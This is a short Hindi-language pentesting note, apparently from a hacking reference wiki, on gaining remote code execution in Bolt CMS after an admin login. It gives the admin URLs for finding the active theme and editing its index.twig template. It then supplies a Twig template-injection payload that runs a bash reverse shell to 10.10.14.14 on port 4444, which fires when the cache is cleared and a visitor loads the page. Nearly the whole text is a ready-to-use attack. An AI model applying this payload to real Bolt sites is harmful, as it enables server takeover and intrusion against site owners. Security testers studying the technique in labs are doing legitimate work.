Bolt CMS
RCE
व्यवस्थापक के रूप में लॉगिन करने के बाद (लॉगिन प्रॉम्प्ट तक पहुँचने के लिए /bot पर जाएँ), आप Bolt CMS में RCE प्राप्त कर सकते हैं:
Configuration
->View Configuration
->Main Configuration
चुनें या URL पथ/bolt/file-edit/config?file=/bolt/config.yaml
पर जाएँथीम का मान जांचें
File management
->View & edit templates
चुनेंपिछले चरण में पाए गए थीम बेस (इस मामले में
base-2021
) का चयन करें औरindex.twig
चुनेंमेरे मामले में यह URL पथ /bolt/file-edit/themes?file=/base-2021/index.twig में है
इस फ़ाइल में template injection (Twig) के माध्यम से अपना पेलोड सेट करें, जैसे:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
और परिवर्तन सहेजें
Maintenance
->Clear the cache
में कैश साफ़ करेंफिर से एक सामान्य उपयोगकर्ता के रूप में पृष्ठ पर पहुँचें, और पेलोड निष्पादित होना चाहिए
Last updated